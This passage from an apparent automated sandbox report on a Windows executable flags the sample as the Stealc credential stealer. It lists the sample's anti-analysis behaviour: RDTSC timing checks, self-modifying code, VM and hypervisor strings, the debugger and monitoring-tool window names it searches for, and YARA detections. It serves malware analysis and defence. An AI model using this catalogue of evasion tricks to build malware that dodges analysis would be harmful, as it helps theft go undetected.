                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8859 second address: AF8862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFF48B second address: AFF4A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Eh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A499B5 second address: A499BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEE95 second address: AFEECF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0BF9145126h 0x00000008 jmp 00007F0BF914512Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F0BF9145128h 0x00000015 jmp 00007F0BF9145137h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEECF second address: AFEED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEED5 second address: AFEEDF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0BF9145126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEEDF second address: AFEEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09C6E second address: B09CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145137h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007F0BF9145126h 0x00000011 jmp 00007F0BF9145131h 0x00000016 popad 0x00000017 jp 00007F0BF914513Fh 0x0000001d jmp 00007F0BF9145139h 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0BF914512Fh 0x0000002b jl 00007F0BF9145126h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09CDB second address: B09CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09CDF second address: B09D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145137h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F0BF9145126h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09D04 second address: B09D26 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0BF8E3D566h 0x00000008 jnp 00007F0BF8E3D566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0BF8E3D570h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E26D second address: B0E280 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007F0BF9145126h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DB93 second address: B0DB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DB99 second address: B0DBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0BF914512Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jnc 00007F0BF9145126h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0BF9145132h 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DBDD second address: B0DBEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DD84 second address: B0DD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11069 second address: B11089 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jl 00007F0BF8E3D566h 0x0000000d jmp 00007F0BF8E3D572h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11089 second address: B11095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F0BF9145126h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A416DE second address: A416E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13B5A second address: B13B60 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22084 second address: B22088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22088 second address: B220A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007F0BF9145126h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B220A0 second address: B220A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B220A6 second address: B220C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145138h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2914B second address: B2914F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2914F second address: B29153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B296B5 second address: B296BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B296BC second address: B296F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F0BF9145136h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F0BF9145132h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B296F0 second address: B296FA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF8E3D566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A2FE second address: B2A302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A302 second address: B2A30D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EEF5 second address: B2EF05 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF9145126h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EF05 second address: B2EF28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F0BF8E3D579h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EF28 second address: B2EF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0BF9145126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EF32 second address: B2EF36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EBD7 second address: B2EBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0BF9145134h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EBF9 second address: B2EC12 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0BF8E3D56Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3D6F2 second address: B3D6FC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF9145126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4122D second address: B41257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Dh 0x00000007 jmp 00007F0BF8E3D575h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41257 second address: B4128B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0BF914512Bh 0x0000000e push edi 0x0000000f jmp 00007F0BF9145133h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 pushad 0x00000018 js 00007F0BF9145126h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4128B second address: B41298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F0BF8E3D56Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3669C second address: B366D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BF9145141h 0x00000008 jmp 00007F0BF914512Eh 0x0000000d jmp 00007F0BF914512Dh 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B366D1 second address: B366D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B366D5 second address: B366E1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0BF9145126h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B366E1 second address: B366F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BF8E3D56Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D8CB second address: B4D8D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D8D0 second address: B4D8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4FF4E second address: B4FF52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6010A second address: B60115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0BF8E3D566h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60284 second address: B602AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0BF9145138h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F0BF9145126h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60441 second address: B6046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D579h 0x00000009 jmp 00007F0BF8E3D56Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6046A second address: B60478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F0BF9145126h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60604 second address: B6060A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6060A second address: B6061A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BF9145128h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6061A second address: B60620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60AFA second address: B60B04 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BF914513Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60B04 second address: B60B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D573h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0BF8E3D577h 0x00000010 jg 00007F0BF8E3D566h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60E14 second address: B60E19 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62BA2 second address: B62BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62BA6 second address: B62BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65A53 second address: B65A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65A59 second address: B65A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B689B6 second address: B689BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0394 second address: 51A0399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A856BF second address: A856C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A76984 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9FE83 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B043C4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00694910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0068DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0068E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00694570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0068ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0068BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00693EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F68A FindFirstFileA,0_2_0068F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681160 GetSystemInfo,ExitProcess,0_2_00681160
                Source: file.exe, file.exe, 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2075749076.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2075749076.0000000001403000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2075749076.00000000013D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13599
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13615
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13596
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13650
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13611
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006845C0 VirtualProtect ?,00000004,00000100,000000000_2_006845C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699750 mov eax, dword ptr fs:[00000030h]0_2_00699750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00697850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5644, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00699600
                Source: file.exe, file.exe, 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00697B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00696920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00696920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00697850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00697A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5644, type: MEMORYSTR
